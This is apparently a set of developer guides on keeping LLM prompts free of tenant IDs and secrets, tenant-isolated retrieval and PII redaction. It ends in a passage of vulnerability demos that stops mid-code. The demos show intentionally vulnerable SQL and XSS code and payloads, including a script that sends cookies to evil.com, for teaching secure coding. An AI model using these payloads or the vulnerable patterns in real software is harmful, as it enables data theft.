        # LLM returns content only
        llm_output = {
            "analysis": "This is the analysis",
            "key_concepts": ["ML", "AI"],
        }

        source_refs = SourceReference(
            document_ids=[uuid4(), uuid4()],
            chunk_ids=[uuid4()],
        )

        result = await attribute_llm_output(
            llm_output=llm_output,
            ctx=ctx,
            source_refs=source_refs,
        )

        # Attribution from context, not LLM
        assert result.user_id == ctx.user_id
        assert result.tenant_id == ctx.tenant_id
        assert result.source_document_ids == source_refs.document_ids

    async def test_rejects_llm_with_ids(self, ctx):
        """Reject LLM output that contains IDs"""

        bad_output = {
            "analysis": "Result for user 123e4567-e89b-12d3-a456-426614174000",
        }

        with pytest.raises(SecurityError):
            await attribute_llm_output(bad_output, ctx, source_refs)

    async def test_source_links_created(self, ctx, db):
        """Source links are created with artifact"""

        result = await attribute_llm_output(...)
        await save_attributed_result(result, db)

        links = await db.execute(
            "SELECT * FROM artifact_source_links WHERE artifact_id = :id",
            {"id": result.id}
        )

        assert len(links) == len(result.source_document_ids)

Pre Llm Filtering

Pre-LLM Filtering

Purpose

Before ANY data reaches the LLM, it must be:

  1. Scoped to the current tenant/user
  2. Filtered for relevance
  3. Stripped of identifiers
  4. Captured for later attribution
┌────────────────────────────────────────────────────────────┐
│                    PRE-LLM PHASE                           │
├────────────────────────────────────────────────────────────┤
│                                                            │
│  User Query ──► Tenant Filter ──► Content Extract ──► LLM  │
│       │              │                   │                 │
│       │              │                   │                 │
│       ▼              ▼                   ▼                 │
│  ┌─────────┐   ┌───────────┐     ┌─────────────┐          │
│  │ Query   │   │ Documents │     │ Text Only   │          │
│  │ Text    │   │ for THIS  │     │ (no IDs)    │          │
│  │         │   │ tenant    │     │             │          │
│  └─────────┘   └───────────┘     └─────────────┘          │
│                      │                                     │
│                      ▼                                     │
│              ┌─────────────┐                              │
│              │ Save Refs   │                              │
│              │ for Later   │  ◄── For post-LLM attribution│
│              │ Attribution │                              │
│              └─────────────┘                              │
│                                                            │
└────────────────────────────────────────────────────────────┘

Implementation

1. Tenant-Scoped Retrieval

from uuid import UUID
from dataclasses import dataclass

@dataclass
class SourceReference:
    """Tracks what was retrieved for attribution"""
    document_ids: list[UUID]
    chunk_ids: list[UUID]
    similarity_scores: list[float]
    retrieval_timestamp: datetime

async def retrieve_with_isolation(
    query: str,
    ctx: RequestContext,
    limit: int = 10,
) -> tuple[list[str], SourceReference]:
    """
    Retrieve documents scoped to tenant/user.
    Returns: (content_texts, source_references)
    """
    # Embed query
    query_embedding = await embed(query)

    # Search with MANDATORY tenant filter
    results = await db.execute(
        """
        SELECT id, chunk_id, content,
               1 - (embedding <-> :query) as similarity
        FROM document_chunks
        WHERE tenant_id = :tenant_id    -- REQUIRED
          AND user_id = :user_id        -- REQUIRED
          AND embedding <-> :query < 0.5
        ORDER BY embedding <-> :query
        LIMIT :limit
        """,
        {
            "tenant_id": ctx.tenant_id,  # From JWT
            "user_id": ctx.user_id,       # From JWT
            "query": query_embedding,
            "limit": limit,
        }
    )

    # Separate content from references
    content_texts = [r.content for r in results]
    source_refs = SourceReference(
        document_ids=[r.id for r in results],
        chunk_ids=[r.chunk_id for r in results],
        similarity_scores=[r.similarity for r in results],
        retrieval_timestamp=datetime.now(timezone.utc),
    )

    return content_texts, source_refs

2. Content Extraction (Strip IDs)

def extract_content_only(documents: list[Document]) -> list[str]:
    """
    Extract text content, stripping any embedded IDs.
    """
    contents = []
    for doc in documents:
        # Get content
        text = doc.content

        # Remove any embedded IDs (defensive)
        text = strip_identifiers(text)

        contents.append(text)

    return contents

def strip_identifiers(text: str) -> str:
    """Remove any identifiers that might have leaked into content"""
    import re

    # Remove UUIDs
    text = re.sub(
        r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
        '[REDACTED]',
        text,
        flags=re.IGNORECASE
    )

    # Remove common ID patterns
    patterns = [
        r'user_id:\s*\S+',
        r'tenant_id:\s*\S+',
        r'doc_id:\s*\S+',
    ]
    for pattern in patterns:
        text = re.sub(pattern, '[REDACTED]', text, flags=re.IGNORECASE)

    return text

3. Full Pre-LLM Pipeline

@dataclass
class PreLLMResult:
    """Complete pre-LLM preparation result"""
    query: str
    context_texts: list[str]
    source_refs: SourceReference
    preparation_time_ms: float

async def prepare_for_llm(
    query: str,
    ctx: RequestContext,
) -> PreLLMResult:
    """
    Complete pre-LLM preparation:
    1. Retrieve with tenant isolation
    2. Extract content only
    3. Save references for attribution
    """
    start = time.monotonic()

    # Step 1: Tenant-scoped retrieval
    raw_results, source_refs = await retrieve_with_isolation(
        query=query,
        ctx=ctx,
    )

    # Step 2: Extract and clean content
    context_texts = [strip_identifiers(text) for text in raw_results]

    # Step 3: Audit for any remaining IDs
    for text in context_texts:
        violations = audit_prompt(text)
        if violations:
            logger.warning(
                "ID found in content, redacting",
                violations=violations,
            )

    elapsed = (time.monotonic() - start) * 1000

    return PreLLMResult(
        query=query,
        context_texts=context_texts,
        source_refs=source_refs,
        preparation_time_ms=elapsed,
    )

OrchestKit Integration

In Content Analysis Workflow

# backend/app/workflows/agents/retriever.py

async def retrieve_context(state: AnalysisState) -> AnalysisState:
    """RAG retrieval with tenant isolation"""

    ctx = state.request_context

    # Pre-LLM preparation
    pre_llm = await prepare_for_llm(
        query=state.analysis_request.query,
        ctx=ctx,
    )

    # Store for later phases
    return state.copy(
        context_texts=pre_llm.context_texts,
        source_refs=pre_llm.source_refs,
        # NO IDs in state that goes to LLM
    )
# backend/app/services/search.py

async def search_libraries(
    query: str,
    ctx: RequestContext,
) -> SearchResult:
    """Search golden dataset with isolation"""

    # Always filter by tenant
    results = await db.execute(
        """
        SELECT id, title, url, summary, content
        FROM golden_dataset
        WHERE tenant_id = :tenant_id
          AND search_vector @@ plainto_tsquery(:query)
        ORDER BY ts_rank(search_vector, plainto_tsquery(:query)) DESC
        LIMIT 20
        """,
        {
            "tenant_id": ctx.tenant_id,
            "query": query,
        }
    )

    # Return content and refs separately
    return SearchResult(
        items=[r.content for r in results],  # Content for LLM
        refs=[r.id for r in results],         # IDs for attribution
    )

Common Mistakes

# ❌ BAD: Query without tenant filter
results = await db.execute("SELECT * FROM documents")

# ❌ BAD: Tenant filter as optional
async def search(tenant_id: UUID | None = None):
    query = "SELECT * FROM documents"
    if tenant_id:  # Can be bypassed!
        query += f" WHERE tenant_id = '{tenant_id}'"

# ❌ BAD: Trusting client-provided tenant
async def search(request: Request):
    tenant_id = request.query_params["tenant_id"]  # Attacker controls!

# ❌ BAD: Including IDs in content
results = [{"id": doc.id, "content": doc.content} for doc in docs]

# ✅ GOOD: Mandatory tenant filter from context
results = await db.execute(
    "SELECT content FROM documents WHERE tenant_id = :tid",
    {"tid": ctx.tenant_id}  # From verified JWT
)

# ✅ GOOD: Content separate from refs
content = [doc.content for doc in docs]  # For LLM
refs = [doc.id for doc in docs]           # For attribution

Testing Pre-LLM Filtering

class TestPreLLMFiltering:

    async def test_retrieval_respects_tenant(
        self,
        tenant_a_ctx,
        tenant_b_ctx,
    ):
        # Create doc for tenant B
        await create_document(
            tenant_id=tenant_b_ctx.tenant_id,
            content="Secret data",
        )

        # Search as tenant A
        result = await prepare_for_llm(
            query="secret",
            ctx=tenant_a_ctx,
        )

        # Must not find tenant B's data
        assert len(result.context_texts) == 0

    async def test_content_has_no_uuids(self, ctx):
        result = await prepare_for_llm(
            query="test query",
            ctx=ctx,
        )

        for text in result.context_texts:
            assert not re.search(UUID_PATTERN, text)

    async def test_source_refs_captured(self, ctx):
        result = await prepare_for_llm(
            query="test query",
            ctx=ctx,
        )

        # Refs saved for attribution
        assert len(result.source_refs.document_ids) > 0
        assert result.source_refs.retrieval_timestamp is not None

Presidio Integration

Microsoft Presidio Integration

Enterprise-grade PII detection and anonymization with Microsoft Presidio.

Installation

pip install presidio-analyzer presidio-anonymizer
python -m spacy download en_core_web_lg

Basic Usage

from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine

# Initialize engines (singleton recommended)
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()

def detect_pii(text: str, language: str = "en") -> list:
    """Detect PII entities in text."""
    return analyzer.analyze(
        text=text,
        language=language,
        entities=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD", "US_SSN"]
    )

def anonymize_text(text: str, language: str = "en") -> str:
    """Detect and anonymize PII in text."""
    results = analyzer.analyze(text=text, language=language)
    return anonymizer.anonymize(text=text, analyzer_results=results).text

Custom Operators

from presidio_anonymizer.entities import OperatorConfig

operators = {
    "PERSON": OperatorConfig("replace", {"new_value": "[PERSON]"}),
    "CREDIT_CARD": OperatorConfig("mask", {"masking_char": "*", "chars_to_mask": 12}),
    "EMAIL_ADDRESS": OperatorConfig("hash", {"hash_type": "sha256"}),
    "US_SSN": OperatorConfig("redact"),
}

anonymized = anonymizer.anonymize(text=text, analyzer_results=results, operators=operators)

Custom Recognizers

from presidio_analyzer import Pattern, PatternRecognizer

internal_id_recognizer = PatternRecognizer(
    supported_entity="INTERNAL_ID",
    patterns=[Pattern(name="internal_id", regex=r"ID-[A-Z]{2}-\d{6}", score=0.9)]
)
analyzer.registry.add_recognizer(internal_id_recognizer)

References

Prompt Audit

Prompt Audit

Purpose

Before any prompt is sent to an LLM, audit it for forbidden content:

┌────────────────────────────────────────────────────────────┐
│                     PROMPT AUDIT                           │
├────────────────────────────────────────────────────────────┤
│                                                            │
│  Prompt Template + Variables ──► Audit ──► Send to LLM     │
│                                    │                       │
│                                    ▼                       │
│                          ┌──────────────┐                  │
│                          │  FORBIDDEN   │                  │
│                          │  PATTERNS    │                  │
│                          ├──────────────┤                  │
│                          │ • user_id    │                  │
│                          │ • tenant_id  │                  │
│                          │ • UUIDs      │                  │
│                          │ • API keys   │                  │
│                          │ • Tokens     │                  │
│                          │ • Secrets    │                  │
│                          └──────────────┘                  │
│                                    │                       │
│                    ┌───────────────┼───────────────┐       │
│                    ▼               ▼               ▼       │
│              ┌──────────┐   ┌──────────┐   ┌──────────┐   │
│              │  CLEAN   │   │ WARNING  │   │  BLOCK   │   │
│              │          │   │          │   │          │   │
│              │ Proceed  │   │ Log +    │   │ Reject   │   │
│              │          │   │ Proceed  │   │          │   │
│              └──────────┘   └──────────┘   └──────────┘   │
│                                                            │
└────────────────────────────────────────────────────────────┘

OrchestKit Forbidden Patterns

Critical (Block Immediately)

PatternRegexWhy Block
UUID[0-9a-f]\{8\}-[0-9a-f]\{4\}-...Hallucination, cross-tenant
API Keyapi[_-]?keySecret exposure
Tokentoken\s*[:=]Auth exposure
Passwordpassword\s*[:=]Credential exposure
Secretsecret\s*[:=]Generic secret

Warning (Log and Review)

PatternRegexWhy Warn
user_iduser[_-]?idLikely context leak
tenant_idtenant[_-]?idLikely isolation leak
analysis_idanalysis[_-]?idLikely tracking leak
document_iddocument[_-]?idLikely reference leak
session_idsession[_-]?idLikely auth leak

Implementation

1. Pattern Definitions

import re
from enum import Enum
from dataclasses import dataclass

class AuditSeverity(Enum):
    CLEAN = "clean"
    WARNING = "warning"
    CRITICAL = "critical"

@dataclass
class AuditViolation:
    pattern: str
    severity: AuditSeverity
    match: str
    position: int

# OrchestKit-specific patterns
CRITICAL_PATTERNS = [
    # UUIDs
    (r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', "UUID"),
    # Secrets
    (r'api[_-]?key\s*[:=]\s*["\']?\S+', "API_KEY"),
    (r'password\s*[:=]\s*["\']?\S+', "PASSWORD"),
    (r'secret\s*[:=]\s*["\']?\S+', "SECRET"),
    (r'token\s*[:=]\s*["\']?\S+', "TOKEN"),
    (r'bearer\s+\S+', "BEARER_TOKEN"),
]

WARNING_PATTERNS = [
    # OrchestKit identifiers
    (r'\buser[_-]?id\b', "USER_ID_FIELD"),
    (r'\btenant[_-]?id\b', "TENANT_ID_FIELD"),
    (r'\banalysis[_-]?id\b', "ANALYSIS_ID_FIELD"),
    (r'\bdocument[_-]?id\b', "DOCUMENT_ID_FIELD"),
    (r'\bartifact[_-]?id\b', "ARTIFACT_ID_FIELD"),
    (r'\bchunk[_-]?id\b', "CHUNK_ID_FIELD"),
    (r'\bsession[_-]?id\b', "SESSION_ID_FIELD"),
    (r'\btrace[_-]?id\b', "TRACE_ID_FIELD"),
    (r'\bworkflow[_-]?run[_-]?id\b', "WORKFLOW_ID_FIELD"),
]

2. Audit Function

def audit_prompt(prompt: str) -> list[AuditViolation]:
    """
    Audit prompt for forbidden patterns.
    Returns list of violations.
    """
    violations = []

    # Check critical patterns
    for pattern, name in CRITICAL_PATTERNS:
        for match in re.finditer(pattern, prompt, re.IGNORECASE):
            violations.append(AuditViolation(
                pattern=name,
                severity=AuditSeverity.CRITICAL,
                match=match.group()[:50],  # Truncate for logging
                position=match.start(),
            ))

    # Check warning patterns
    for pattern, name in WARNING_PATTERNS:
        for match in re.finditer(pattern, prompt, re.IGNORECASE):
            violations.append(AuditViolation(
                pattern=name,
                severity=AuditSeverity.WARNING,
                match=match.group(),
                position=match.start(),
            ))

    return violations

def has_critical_violations(violations: list[AuditViolation]) -> bool:
    """Check if any violations are critical"""
    return any(v.severity == AuditSeverity.CRITICAL for v in violations)

3. Audit Decorator

from functools import wraps
import structlog

logger = structlog.get_logger()

def audit_before_llm(func):
    """
    Decorator that audits prompts before LLM call.
    Blocks on critical violations, logs warnings.
    """
    @wraps(func)
    async def wrapper(*args, **kwargs):
        # Extract prompt from args/kwargs
        prompt = kwargs.get("prompt") or args[0]

        # Audit
        violations = audit_prompt(prompt)

        # Log warnings
        for v in violations:
            if v.severity == AuditSeverity.WARNING:
                logger.warning(
                    "prompt_audit_warning",
                    pattern=v.pattern,
                    position=v.position,
                )

        # Block on critical
        if has_critical_violations(violations):
            critical = [v for v in violations
                       if v.severity == AuditSeverity.CRITICAL]
            raise PromptSecurityError(
                f"Prompt contains forbidden content: {[v.pattern for v in critical]}"
            )

        # Proceed
        return await func(*args, **kwargs)

    return wrapper

# Usage
@audit_before_llm
async def call_llm(prompt: str) -> str:
    return await llm.generate(prompt)

4. Safe Prompt Builder

class SafePromptBuilder:
    """
    Builds prompts with built-in audit.
    Prevents accidental ID inclusion.
    """

    def __init__(self):
        self._parts: list[str] = []
        self._context_ids: dict[str, Any] = {}  # Stored but never in prompt

    def add_instruction(self, text: str) -> "SafePromptBuilder":
        """Add instruction text (audited)"""
        violations = audit_prompt(text)
        if has_critical_violations(violations):
            raise PromptSecurityError("Instruction contains forbidden content")
        self._parts.append(text)
        return self

    def add_content(self, content: str) -> "SafePromptBuilder":
        """Add user content (sanitized)"""
        # Strip any IDs from content
        clean_content = self._sanitize(content)
        self._parts.append(clean_content)
        return self

    def add_context_texts(self, texts: list[str]) -> "SafePromptBuilder":
        """Add context texts (sanitized)"""
        for text in texts:
            clean = self._sanitize(text)
            self._parts.append(f"- {clean}")
        return self

    def store_context_id(self, key: str, value: Any) -> "SafePromptBuilder":
        """Store ID for post-LLM attribution (never in prompt)"""
        self._context_ids[key] = value
        return self

    def _sanitize(self, text: str) -> str:
        """Remove any IDs from text"""
        # Remove UUIDs
        text = re.sub(
            r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
            '[ID]',
            text,
            flags=re.IGNORECASE
        )
        return text

    def build(self) -> tuple[str, dict]:
        """
        Build prompt and return with stored context.
        Returns: (prompt, context_ids)
        """
        prompt = "\n\n".join(self._parts)

        # Final audit
        violations = audit_prompt(prompt)
        if violations:
            logger.warning(
                "prompt_audit_final",
                violation_count=len(violations),
            )

        if has_critical_violations(violations):
            raise PromptSecurityError("Built prompt contains forbidden content")

        return prompt, self._context_ids

# Usage
builder = SafePromptBuilder()
prompt, context = (
    builder
    .add_instruction("Analyze the following content:")
    .add_content(user_query)
    .add_context_texts(retrieved_docs)
    .store_context_id("user_id", ctx.user_id)  # Stored, not in prompt
    .store_context_id("sources", source_refs)   # Stored, not in prompt
    .build()
)

OrchestKit Integration

Workflow Integration

# backend/app/workflows/agents/prompts/content_analysis.py

from llm_safety import SafePromptBuilder

def build_analysis_prompt(
    query: str,
    context_texts: list[str],
    ctx: RequestContext,
) -> tuple[str, dict]:
    """
    Build content analysis prompt safely.
    Context IDs stored separately for attribution.
    """
    return (
        SafePromptBuilder()
        .add_instruction("""
        You are an expert content analyzer. Analyze the following
        content and provide insights about:
        1. Key concepts
        2. Difficulty level
        3. Prerequisites
        4. Summary
        """)
        .add_instruction(f"User query: {query}")
        .add_instruction("Relevant context:")
        .add_context_texts(context_texts)
        .store_context_id("user_id", ctx.user_id)
        .store_context_id("tenant_id", ctx.tenant_id)
        .store_context_id("trace_id", ctx.trace_id)
        .build()
    )

CI/CD Integration

#!/bin/bash
# scripts/audit_prompts.sh

echo "Auditing prompt templates..."

# Check for IDs in prompt files
grep -rn \
    "user_id\|tenant_id\|analysis_id\|document_id\|[0-9a-f]\{8\}-[0-9a-f]\{4\}" \
    backend/app/**/prompts/ \
    --include="*.py" \
    --include="*.txt" \
    --include="*.jinja2"

if [ $? -eq 0 ]; then
    echo "❌ Found potential ID leaks in prompts!"
    exit 1
fi

echo "✅ Prompt audit passed"

Testing

class TestPromptAudit:

    def test_detects_uuid(self):
        prompt = "Analyze doc 123e4567-e89b-12d3-a456-426614174000"
        violations = audit_prompt(prompt)

        assert len(violations) == 1
        assert violations[0].severity == AuditSeverity.CRITICAL
        assert violations[0].pattern == "UUID"

    def test_detects_api_key(self):
        prompt = "Use api_key: sk-1234567890abcdef"
        violations = audit_prompt(prompt)

        assert any(v.pattern == "API_KEY" for v in violations)

    def test_warns_on_user_id_field(self):
        prompt = "For user_id please provide analysis"
        violations = audit_prompt(prompt)

        assert len(violations) == 1
        assert violations[0].severity == AuditSeverity.WARNING

    def test_safe_builder_blocks_id(self):
        with pytest.raises(PromptSecurityError):
            (
                SafePromptBuilder()
                .add_instruction("Analyze for user 123e4567-e89b-12d3-a456-426614174000")
                .build()
            )

    def test_safe_builder_sanitizes_content(self):
        prompt, _ = (
            SafePromptBuilder()
            .add_content("Doc ID: 123e4567-e89b-12d3-a456-426614174000")
            .build()
        )

        assert "123e4567" not in prompt
        assert "[ID]" in prompt

    def test_context_ids_not_in_prompt(self):
        from uuid import uuid4

        user_id = uuid4()
        prompt, context = (
            SafePromptBuilder()
            .add_instruction("Analyze this")
            .store_context_id("user_id", user_id)
            .build()
        )

        assert str(user_id) not in prompt
        assert context["user_id"] == user_id

Request Context Pattern

Request Context Pattern

Purpose

The RequestContext is an immutable object created at the gateway that carries identity and tracing information through the entire request lifecycle. It flows AROUND the LLM (never in prompts) and is used for:

  1. Authorization - Who is making the request
  2. Data Filtering - Scope queries to tenant/user
  3. Attribution - Tag results with proper ownership
  4. Observability - Correlate logs and traces

Implementation

from dataclasses import dataclass
from datetime import datetime, timezone
from uuid import UUID
from typing import FrozenSet

@dataclass(frozen=True)  # Immutable!
class RequestContext:
    """
    System context that NEVER appears in LLM prompts.
    Created at gateway, flows through all layers.
    """

    # === Identity (WHO) ===
    user_id: UUID
    tenant_id: UUID  # For B2B multi-tenant
    session_id: str
    permissions: FrozenSet[str]

    # === Tracing (OBSERVABILITY) ===
    request_id: str  # Unique per request
    trace_id: str    # Distributed tracing
    span_id: str     # Current span

    # === Resource (WHAT) ===
    resource_id: UUID | None = None  # analysis_id, document_id, etc.
    resource_type: str | None = None

    # === Metadata (WHEN, WHERE) ===
    timestamp: datetime = None
    client_ip: str = ""
    user_agent: str = ""

    def __post_init__(self):
        if self.timestamp is None:
            object.__setattr__(self, 'timestamp', datetime.now(timezone.utc))

Creation at Gateway

from fastapi import Request, Depends
from jose import jwt

async def get_request_context(request: Request) -> RequestContext:
    """FastAPI dependency that creates RequestContext from JWT"""

    # 1. Extract and verify JWT
    auth_header = request.headers.get("Authorization", "")
    if not auth_header.startswith("Bearer "):
        raise HTTPException(401, "Missing authorization")

    token = auth_header[7:]
    try:
        claims = jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
    except jwt.JWTError:
        raise HTTPException(401, "Invalid token")

    # 2. Build immutable context
    return RequestContext(
        user_id=UUID(claims["sub"]),
        tenant_id=UUID(claims["tenant_id"]),
        session_id=claims["session_id"],
        permissions=frozenset(claims.get("permissions", [])),
        request_id=request.headers.get("X-Request-ID", str(uuid4())),
        trace_id=generate_trace_id(),
        span_id=generate_span_id(),
        client_ip=request.client.host,
        user_agent=request.headers.get("User-Agent", ""),
    )

Usage in Endpoints

@router.post("/api/v1/analyze")
async def create_analysis(
    request: AnalyzeRequest,
    ctx: RequestContext = Depends(get_request_context),
):
    # Context is available throughout the request
    # Pass it to services, repositories, etc.

    # Authorization uses context
    await authorize(ctx, "analysis:create", None)

    # Data access uses context for filtering
    documents = await repo.find_by_user(ctx)

    # LLM call does NOT receive context
    # (see llm-safety-patterns skill)

    # Attribution uses context
    result = await save_result(llm_output, ctx)

    return result

OrchestKit Parameters

In OrchestKit, these identifiers should be in RequestContext:

ParameterTypeSourcePurpose
user_idUUIDJWTData ownership
tenant_idUUIDJWTMulti-tenant isolation
session_idstrJWTSession tracking
analysis_idUUIDGeneratedCurrent analysis job
trace_idstrGeneratedLangfuse tracing
request_idstrHeader/GeneratedRequest correlation

Why Immutable?

The context is frozen (frozen=True) to prevent:

  1. Accidental modification - Can't change user_id mid-request
  2. Security bypass - Can't escalate permissions
  3. Thread safety - Safe to pass between async tasks
  4. Hashability - Can be used as dict key for caching

Anti-Patterns

# BAD: Mutable context
class RequestContext:
    user_id: UUID  # Can be changed!

# BAD: Context in prompt
prompt = f"User {ctx.user_id} wants to analyze..."

# BAD: Context not passed to services
result = await service.process(content)  # Missing ctx!

# BAD: Context created inside service
def process(self):
    ctx = RequestContext(...)  # Should come from gateway!

Tenant Isolation

Tenant Isolation Patterns

The Golden Rule

Every database query MUST include a tenant filter. There is no "global" query.

Why This Matters

Without tenant isolation:

  • User A could see User B's documents
  • LLM could mix data from different tenants
  • A bug could expose all customers' data
  • Compliance violations (GDPR, HIPAA, SOC2)

Implementation Pattern: Tenant-Scoped Repository

from uuid import UUID
from typing import TypeVar, Generic
from sqlalchemy import select
from sqlalchemy.ext.asyncio import AsyncSession

T = TypeVar("T")

class TenantScopedRepository(Generic[T]):
    """
    Base repository that ALWAYS filters by tenant.
    Cannot be bypassed - tenant filter is mandatory.
    """

    def __init__(self, session: AsyncSession, ctx: RequestContext, model: type[T]):
        self.session = session
        self.ctx = ctx
        self.model = model

    def _base_query(self):
        """Every query starts with tenant filter"""
        return select(self.model).where(
            self.model.tenant_id == self.ctx.tenant_id
        )

    async def find_all(self, **filters) -> list[T]:
        """Find all matching records (tenant-scoped)"""
        query = self._base_query()
        for key, value in filters.items():
            query = query.where(getattr(self.model, key) == value)
        result = await self.session.execute(query)
        return result.scalars().all()

    async def find_by_id(self, id: UUID) -> T | None:
        """
        Find by ID (tenant-scoped).
        Even by-ID lookup includes tenant check!
        """
        query = self._base_query().where(self.model.id == id)
        result = await self.session.execute(query)
        return result.scalar_one_or_none()

    async def find_by_user(self) -> list[T]:
        """Find records owned by current user (tenant + user scoped)"""
        query = self._base_query().where(
            self.model.user_id == self.ctx.user_id
        )
        result = await self.session.execute(query)
        return result.scalars().all()

Vector Search with Tenant Isolation

async def semantic_search(
    query_embedding: list[float],
    ctx: RequestContext,
    limit: int = 10,
) -> list[Document]:
    """
    Semantic search with mandatory tenant isolation.
    """
    return await db.execute(
        """
        SELECT id, content, metadata,
               1 - (embedding <-> :query) as similarity
        FROM documents
        WHERE tenant_id = :tenant_id          -- ALWAYS filtered!
          AND user_id = :user_id              -- User's docs only
          AND embedding <-> :query < 0.5      -- Similarity threshold
        ORDER BY embedding <-> :query
        LIMIT :limit
        """,
        {
            "tenant_id": ctx.tenant_id,  # From context
            "user_id": ctx.user_id,       # From context
            "query": query_embedding,
            "limit": limit,
        }
    )

Full-Text Search with Tenant Isolation

async def fulltext_search(
    query: str,
    ctx: RequestContext,
    limit: int = 20,
) -> list[Analysis]:
    """
    Full-text search with mandatory tenant isolation.
    """
    return await db.execute(
        """
        SELECT id, title, url,
               ts_rank(search_vector, plainto_tsquery(:query)) as rank
        FROM analyses
        WHERE tenant_id = :tenant_id          -- ALWAYS filtered!
          AND user_id = :user_id              -- User's analyses only
          AND status = 'complete'
          AND search_vector @@ plainto_tsquery(:query)
        ORDER BY rank DESC
        LIMIT :limit
        """,
        {
            "tenant_id": ctx.tenant_id,
            "user_id": ctx.user_id,
            "query": query,
            "limit": limit,
        }
    )

Caching with Tenant Isolation

def cache_key(ctx: RequestContext, operation: str, *args) -> str:
    """
    Cache keys MUST include tenant_id to prevent cross-tenant leakage.
    """
    return f"{ctx.tenant_id}:{ctx.user_id}:{operation}:{':'.join(str(a) for a in args)}"

# Usage
key = cache_key(ctx, "analysis", analysis_id)
# Result: "tenant_abc:user_123:analysis:analysis_456"

Testing Tenant Isolation

import pytest
from uuid import uuid4

class TestTenantIsolation:
    """Every repository MUST have these tests"""

    @pytest.fixture
    def tenant_a_ctx(self):
        return RequestContext(
            user_id=uuid4(),
            tenant_id=uuid4(),  # Tenant A
            ...
        )

    @pytest.fixture
    def tenant_b_ctx(self):
        return RequestContext(
            user_id=uuid4(),
            tenant_id=uuid4(),  # Tenant B (different!)
            ...
        )

    async def test_tenant_a_cannot_see_tenant_b_documents(
        self,
        tenant_a_ctx,
        tenant_b_ctx,
        db_session,
    ):
        # Create document for Tenant B
        doc = Document(
            id=uuid4(),
            tenant_id=tenant_b_ctx.tenant_id,
            content="Secret data",
        )
        await db_session.add(doc)
        await db_session.commit()

        # Tenant A tries to access
        repo = TenantScopedRepository(db_session, tenant_a_ctx, Document)
        result = await repo.find_by_id(doc.id)

        # MUST be None - tenant A cannot see tenant B's data
        assert result is None

    async def test_tenant_a_cannot_search_tenant_b_documents(
        self,
        tenant_a_ctx,
        tenant_b_ctx,
    ):
        # Create and embed document for Tenant B
        await create_document(
            tenant_id=tenant_b_ctx.tenant_id,
            content="Machine learning tutorial",
        )

        # Tenant A searches for "machine learning"
        results = await semantic_search(
            query_embedding=embed("machine learning"),
            ctx=tenant_a_ctx,
        )

        # MUST be empty - tenant A cannot find tenant B's data
        assert len(results) == 0

Common Mistakes

# BAD: Global query without tenant filter
async def find_all():
    return await db.execute("SELECT * FROM documents")

# BAD: Tenant filter as optional parameter
async def find(tenant_id: UUID | None = None):
    query = "SELECT * FROM documents"
    if tenant_id:  # Can be bypassed!
        query += f" WHERE tenant_id = '{tenant_id}'"

# BAD: Trusting client-provided tenant_id
async def find(request: Request):
    tenant_id = request.query_params["tenant_id"]  # User controls this!
    return await db.find(tenant_id=tenant_id)

# GOOD: Tenant from authenticated context only
async def find(ctx: RequestContext):
    return await db.find(tenant_id=ctx.tenant_id)  # From JWT

Row-Level Security (PostgreSQL)

For additional protection, use PostgreSQL RLS:

-- Enable RLS on table
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;

-- Create policy
CREATE POLICY tenant_isolation ON documents
    USING (tenant_id = current_setting('app.tenant_id')::uuid);

-- Set tenant before queries
SET app.tenant_id = 'tenant-uuid-here';

This provides database-level enforcement even if application code has bugs.

Vulnerability Demos

Vulnerability Demonstrations

Interactive examples showing how common vulnerabilities work and how to fix them.


SQL Injection

Vulnerable Code

# DO NOT USE - Example only
from fastapi import FastAPI, Query
import sqlite3

app = FastAPI()

@app.get("/users/search")
def search_users(username: str = Query(...)):
    conn = sqlite3.connect("app.db")
    cursor = conn.cursor()

    # VULNERABLE: User input directly in query
    query = f"SELECT * FROM users WHERE username = '{username}'"
    cursor.execute(query)

    return cursor.fetchall()

# Attack payload: username = "' OR '1'='1' --"
# Resulting query: SELECT * FROM users WHERE username = '' OR '1'='1' --'
# This returns ALL users in the database

Secure Code

# Safe implementation using parameterized queries
from fastapi import FastAPI, Query
import sqlite3

app = FastAPI()

@app.get("/users/search")
def search_users(username: str = Query(..., min_length=1, max_length=50)):
    conn = sqlite3.connect("app.db")
    cursor = conn.cursor()

    # SAFE: Parameterized query - input is escaped by the driver
    cursor.execute("SELECT * FROM users WHERE username = ?", (username,))

    return cursor.fetchall()

# With SQLAlchemy ORM (preferred)
from sqlalchemy.orm import Session
from models import User

def search_users_orm(db: Session, username: str):
    # SAFE: ORM handles parameterization
    return db.query(User).filter(User.username == username).first()

Detection

  • Pattern to find: f"SELECT, f"INSERT, f"UPDATE, f"DELETE, + "SELECT
  • Bandit rule: B608 (hardcoded_sql_expressions)
  • Semgrep rule: python.lang.security.audit.formatted-sql-query
# Detect with Bandit
bandit -r . -t B608

# Detect with Semgrep
semgrep --config "p/sql-injection" .

# Grep for f-string SQL
grep -rn "f\"SELECT\|f\"INSERT\|f\"UPDATE\|f\"DELETE" --include="*.py" .

Cross-Site Scripting (XSS)

Vulnerable Code

// DO NOT USE - Example only

// Reflected XSS - Dangerous innerHTML
function displayMessage() {
    const urlParams = new URLSearchParams(window.location.search);
    const message = urlParams.get('message');

    // VULNERABLE: User input directly inserted as HTML
    document.getElementById('output').innerHTML = message;
}

// Attack payload: ?message=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
// This executes JavaScript that steals cookies
# DO NOT USE - Server-side XSS (Flask)
from flask import Flask, request

app = Flask(__name__)

@app.route('/greet')
def greet():
    name = request.args.get('name', '')

    # VULNERABLE: User input in HTML response
    return f"<h1>Hello, {name}!</h1>"

# Attack: /greet?name=<script>alert('XSS')</script>

Secure Code

// Safe implementation using textContent
function displayMessage() {
    const urlParams = new URLSearchParams(window.location.search);
    const message = urlParams.get('message');

    // SAFE: textContent escapes HTML entities
    document.getElementById('output').textContent = message;
}

// If HTML is required, use DOMPurify
import DOMPurify from 'dompurify';

